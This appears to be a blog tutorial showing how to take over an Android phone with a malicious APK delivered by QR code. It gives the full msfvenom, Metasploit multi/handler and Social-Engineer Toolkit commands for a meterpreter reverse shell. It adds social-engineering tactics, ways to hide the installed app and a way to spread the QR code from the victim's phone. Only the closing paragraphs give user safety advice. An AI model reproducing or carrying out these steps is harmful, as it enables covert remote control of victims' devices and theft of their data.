This Method is not completely automatic, meaning the target will have a role to play. Consequently, social engineering is a critical component.

In addition, the method might not work on every Android device. Security settings, presence of anti-viruses, and Google safety mechanisms are just a few of the possible obstacles to a successful attack.

Tools we are going to use :- Kali Linux (OS) , Metasploit and Social Engineering Toolkit (SET)

Step 1

The first step is to use msfvenom to prepare the payload, the code that will allow the threat actor to obtain access to the target’s device.

Open the terminal and type the following:-

Code:msfvenom -p android/meterpreter/reverse_tcp lhost=youripaddress lport=4444 r >/var/www/html/test.apk

Lhost (local host) indicates the IP that the payload will use to connect back to the threat actor’s machine.
If, for instance, the machine and the smartphone are connected to the same Wi-Fi, the IP can be found by typing in the terminal “ifconfig” and checking the “inet” (internet address) of the Wi-Fi card.
If the smartphone is using mobile data or is connected to another router, the threat actor must use the public IP of his machine. It can be found by visiting http://whatismyipaddress.com.

Step 2

In the terminal, type “service apache2 start” and press [Enter]. Now, it is time to launch Metasploit. To properly run this tool, there are a few steps that should be followed. First, type “service postgresql start” and press [Enter].

Next, run the command “msfdb init”. Finally, run “msfconsole” to launch the tool.

Step 3

Type “use exploit/multi/handler” and press [Enter]. Then, type “set payload android/meterpreter/reverse_tcp” and press [Enter]. Now, type “show options” to see the information needed to execute the attack.

As you can see from the screenshot, LHOST must be provided. LHOST, as mentioned, is the IP address used by the threat actor. To provide the information, type “set lhost” followed by your IP address. The format is “set [space] lhost [space] youripaddress”. As a final input, type “exploit” and press [Enter]. Remember, do not close the terminal.

Step 4

Open another terminal, type “setoolkit”, and press [Enter].

Type “1” (to select “Social-Engineering Attacks”) and press [Enter].

Next, type “8” (to select “QRCode Generator Attack Vector”) and press [Enter]. When requested, type the IP address you used before followed by “/” and the payload, in this case “test.apk”.The format is the following: “youripaddress/nameofthepayload.apk”.

Step 5

Exit SEToolkit and type “cd /root/.set/reports” to find the folder where the QR code has been saved. At this point, the threat actor must use social engineering to convince the target to scan the code.

Step 6

The target scans the QR code. He receives a request to download the application.

He is convinced that he is downloading an application he needs. Therefore, he follows the steps and successfully installs the app.

Step 7

The moment the app is installed on the target’s device, the threat actor notices that a meterpreter session is now open. Typing “sysinfo” allows him to check if the operation has been successful. After confirming the positive results, he types “help” to visualize the many commands that can be executed.

Known obstacles

There are a few obstacles that must be addressed. Social engineering is halfway between a skill and an art. It is not easy, but depending on the situation, anyone can be tricked. Tiredness, hurriedness, boredom, anger, there are several emotions and states of mind that can be exploited. However, there are also technical challenges that might compromise the outcome of the attack.

First, not all QR scanners search the link directly. I used four scanners, and two of them searched the link on Google instead of searching it directly. Second, security mechanisms might hinder the process. If the target does not allow the installation of apps from unknown sources, the file will not be downloaded. Moreover, during the installation, Play Protect warned me twice regarding my actions. It happens that users just keep tapping without reading to make the notifications go away, but a more rational user might think again about downloading the file. In addition, before installing the app, a list of permissions is displayed, and the user might ask himself why the app needs access to virtually everything.

Third, the name. As you can see from the screenshots, “MainActivity” is very likely to alert most users. Moreover, the app is visibly different from a ‘classic’ one.


While there are methods to avoid the obstacles I listed, it is likely that a user would not download, or install, the application if multiple alerts warn him of suspicious activity. A situation where the threat actor has access, even briefly, to the target’s smartphone might provide the perfect opportunity to download the malicious file. It takes a few seconds and, when the app is installed, the threat actor could hide it in an unusual directory, possibly hidden. The moment the meterpreter session is open, the threat actor can further exploit the device, including sending the same QR code to other users via the target’s device.

QR codes, as demonstrated, can be used as a vector to compromise your device. The method I explained requires the target to manually download the malicious file, but many other exploits are automatic and stealthy and do not require further actions after scanning the code. Be careful about what you scan. Even a seemingly innocent QR code could lead to a harmful outcome. When you scan a code, think carefully about the following:

Necessity. Do I really need to scan this code? Or am I just curious?

The need to use a QR code. Are there other download methods? Is the source of the QR code a reputable one?

The permissions. How many permissions is the app asking me? Is it rational for such an app to ask access to these sources?

Security alerts. If you see an alert, stop and read. Remember, haste makes waste.


No comments yet. Why don’t you start the discussion?

Leave a Reply

Your email address will not be published. Required fields are marked *